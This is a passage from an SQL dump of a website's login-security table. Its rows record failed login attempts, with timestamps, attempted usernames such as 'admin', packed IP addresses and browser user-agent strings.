Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4197,7298,1629011508.749273,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4198,7300,1629012137.033105,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(4199,7304,1629013787.646069,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(4200,7305,1629014050.804514,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��Eţ�','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(4201,7306,1629014051.492622,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4202,7308,1629014937.126803,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����3','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(4203,7309,1629015449.922706,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),(4204,7310,1629015577.733538,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4205,7311,1629015675.175562,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),(4206,7313,1629016086.144819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H��s','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4207,7314,1629016729.766568,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���E\"�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(4208,7318,1629019547.435164,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(4209,7319,1629019970.704903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4210,7320,1629020677.902437,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l���','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4211,7322,1629021827.859278,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4212,7325,1629024045.335290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4213,7326,1629024780.670575,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4214,7327,1629025289.604303,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N/ɏ','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4215,7328,1629026114.095788,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4216,7329,1629026447.774696,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4217,7331,1629027602.241075,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(4218,7332,1629028241.983624,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(4219,7333,1629028758.130019,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(4220,7338,1629029404.515821,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/��','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4221,7341,1629030258.379246,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Aێ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4222,7342,1629032380.147351,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%a�b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4223,7344,1629034549.415650,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4224,7346,1629035889.335673,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(4225,7347,1629036419.345950,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�\r�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4226,7355,1629055092.370923,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4227,7359,1629061580.257739,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4228,7365,1629066650.743796,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(4229,7369,1629074131.158686,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����^','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4230,7372,1629077094.589023,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.6','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(4231,7376,1629080427.772637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Kȷ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4232,7377,1629083572.160758,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(4233,7378,1629086112.115804,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),(4234,7381,1629089886.672835,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���aZ','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4235,7383,1629092938.116913,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ghIo','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4236,7384,1629095915.744557,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���D�	','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(4237,7388,1629099535.474853,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(4238,7389,1629100663.496545,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\r3R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4239,7390,1629101866.071134,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��O�Uw','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4240,7391,1629101949.527986,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4241,7391,1629101949.601285,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4242,7392,1629102853.794170,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���iq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4243,7393,1629104016.256154,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n- ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4244,7394,1629104989.269064,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���7o\r','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4245,7395,1629105223.934493,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���H�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4246,7396,1629106379.933264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4247,7397,1629106639.453374,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�0�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4248,7398,1629107560.347959,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��P���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4249,7399,1629108021.758708,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(4250,7400,1629108754.124359,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��UX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4251,7401,1629110050.512534,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\"E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4252,7403,1629111417.296745,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4253,7406,1629112318.525181,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(4254,7407,1629112743.273238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4255,7408,1629114092.252906,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4256,7409,1629114111.363496,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4257,7411,1629117817.928572,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��vz^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4258,7412,1629119059.675014,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��M�~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4259,7413,1629121599.821161,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��}�L1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4260,7414,1629122721.504089,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4261,7415,1629123992.278680,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\"E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4262,7416,1629125175.122345,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-�c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4263,7418,1629127679.251315,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4264,7419,1629128211.039206,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.6','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(4265,7421,1629129659.704908,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2'),(4266,7422,1629130320.246757,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(4267,7423,1629130346.080437,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\r3R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4268,7424,1629131484.254903,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���\"%\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4269,7425,1629132963.072864,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���!ƫ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4270,7427,1629135502.322044,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4271,7428,1629136764.936653,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��p�wB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4272,7429,1629137998.737024,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��6&Ř','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4273,7430,1629138460.411733,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4274,7431,1629138468.004103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4275,7432,1629138477.742464,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4276,7433,1629138481.284741,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4277,7434,1629138486.629068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4278,7435,1629138491.316539,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4279,7436,1629138494.138556,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4280,7437,1629138496.054484,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4281,7438,1629138497.816020,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4282,7439,1629138500.118513,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4283,7440,1629138501.468576,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4284,7441,1629138503.068411,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4285,7442,1629138504.374597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4286,7442,1629138504.531304,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4287,7443,1629138507.156229,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4288,7443,1629138507.274923,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4289,7444,1629138508.946132,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4290,7445,1629138509.682036,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4291,7445,1629138509.780574,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4292,7447,1629138913.265136,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�4�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4293,7448,1629139149.188509,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),(4294,7449,1629139383.243582,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4295,7450,1629140608.277005,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4296,7451,1629141969.865175,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���H�%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4297,7452,1629143162.118695,1,'loginFailInvalidUsername','wakgos',0,'\0\0\0\0\0\0\0\0\0\0���W�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4298,7453,1629144470.819557,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4299,7454,1629145783.897413,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��p�wB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4300,7455,1629146351.367903,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),(4301,7455,1629146351.411672,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),(4302,7456,1629146938.863204,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����դ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4303,7459,1629148345.629932,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ԁ\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4304,7460,1629149717.554534,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���%*2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4305,7461,1629150956.632740,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4306,7462,1629152302.706563,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���H�%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4307,7464,1629153646.200788,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��e \Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4308,7465,1629154636.980031,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(4309,7466,1629154691.707771,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4310,7467,1629154695.472931,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4311,7468,1629154706.202852,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4312,7469,1629154710.349265,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4313,7470,1629154712.992609,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4314,7471,1629154714.992160,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4315,7472,1629154716.480611,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) 